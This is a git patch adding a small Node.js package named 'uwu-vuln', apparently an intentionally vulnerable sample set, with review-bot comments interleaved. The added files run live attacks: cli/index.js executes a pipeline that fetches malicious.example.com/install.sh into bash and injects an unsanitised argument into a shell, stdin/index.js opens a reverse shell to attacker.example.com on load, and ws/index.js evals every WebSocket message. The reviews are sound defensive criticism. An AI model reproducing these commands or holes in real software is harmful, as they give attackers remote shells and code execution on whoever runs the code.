From ea24d94939588b772f7fd53b030fab0ddac60f3a Mon Sep 17 00:00:00 2001
From: Mohammed
Date: Wed, 26 Nov 2025 21:47:40 -0500
Subject: [PATCH] added
---
cli/index.js | 18 ++++++++++++++++++
disk/index.js | 17 +++++++++++++++++
package.json | 11 +++++++++++
stdin/index.js | 12 ++++++++++++
ws/index.js | 12 ++++++++++++
5 files changed, 70 insertions(+)
create mode 100644 cli/index.js
create mode 100644 disk/index.js
create mode 100644 package.json
create mode 100644 stdin/index.js
create mode 100644 ws/index.js
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+ rm -rf /tmp/vuln_dir --no-preserve-root &&
+ curl http://malicious.example.com/install.sh | bash &&
+ ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Pipeline failed:', err);
+ return;
+ }
+ console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+ const file = req.query.file;
+ const fullPath = path.resolve(__dirname, file);
+ if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+ fs.readFile(fullPath, 'utf8', (err, data) => {
+ if (err) return res.status(500).send(err.message);
+ res.send(data);
+ });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
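Review bot: In cli/index.js, `process.argv[2]` is interpolated straight into the shell string (`ls ${userArg}`), so any shell metacharacter in the argument changes the command that `exec` runs; import `execFile` instead and call `execFile('ls', ['--', userArg], callback)`, which passes the value as a single argument and never starts a shell. The same template downloads a script over plain HTTP and pipes it to `bash` with no checksum or signature check, so whatever that host or an on-path party returns would run with the caller's privileges. If this file is meant as a scanner test fixture (the log text suggests it, the commit message does not say), add a header comment such as `// Intentionally vulnerable fixture: do not execute outside a disposable sandbox.` and keep the command as inert data rather than passing it to `exec`. `--no-preserve-root` serves no purpose on a `/tmp` path and should be dropped.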
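Review bot: In disk/index.js, `req.query.file` reaches `path.resolve` without a type check, so a missing or repeated `file` parameter (Express then yields `undefined` or an array) makes `path.resolve` throw instead of returning the 400; add `if (typeof file !== 'string') return res.status(400).send('Invalid file path');` before it. The `startsWith(__dirname + path.sep)` guard is lexical only, so a symlink below `__dirname` is still followed to wherever it points unless the comparison is made on `fs.realpath` output, and the base directory is the service's own source tree; a dedicated data directory would be a narrower root. `res.status(500).send(err.message)` returns the absolute filesystem path in not-found errors, and `res.send(data)` serves file contents with an HTML content type; a generic error body and `res.type('text/plain')` avoid both. The `// Path Traversal` comment no longer describes the handler now that it has a containment check; something like `// Serves files under __dirname only; rejects paths that resolve outside it.` would be accurate.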
@@ -0,0 +1,11 @@
+{
+ "name": "uwu-vuln",
+ "version": "1.0.0",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "",
+ "license": "ISC",
+ "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+ if (err) {
+ console.error('[!] Error executing payload:', err);
+ return;
+ }
+ console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+ ws.on('message', msg => {
+ eval(msg);
+ ws.send('Executed: ' + msg);
+ });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file
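Review bot: package.json declares no `dependencies` although disk/index.js requires `express` and ws/index.js requires `ws`, so a clean install cannot run either file and nothing pins the versions that get resolved. Add both with explicit version ranges and commit the lockfile alongside. `"main": "index.js"` also points at a root-level file this commit does not create.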
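Review bot: Loading stdin/index.js immediately runs a hard-coded command that opens an outbound interactive shell to a remote host, with no flag, prompt or environment check in front of the `exec` call. If the intent is a sample for detection tooling (the commit message does not say), the string should stay inert: drop the `exec(payload, …)` call, keep `payload` only as data a scanner can match, and add a header comment such as `// Detection sample only: this string is never executed.` Nothing in the file reads standard input, so the `stdin/` directory name does not describe it, and the `stderr` callback parameter is unused.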
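Review bot: In ws/index.js, `eval(msg)` treats every WebSocket frame as JavaScript to run in the server process, and the server is created with only `{ port: 8080 }`, so it listens on all interfaces with no authentication or Origin check in front of the handler. Replace the `eval` with a parser for a fixed message format, for example `const req = JSON.parse(msg);` followed by a lookup of `req.action` in an allowlisted handler map, and close the connection on anything else. For local-only use, bind explicitly with `new WebSocket.Server({ host: '127.0.0.1', port: 8080 })`. The `// RCE` comment should say what the handler is for, and the `'Executed: ' + msg` reply that echoes raw input can go once handlers return structured results.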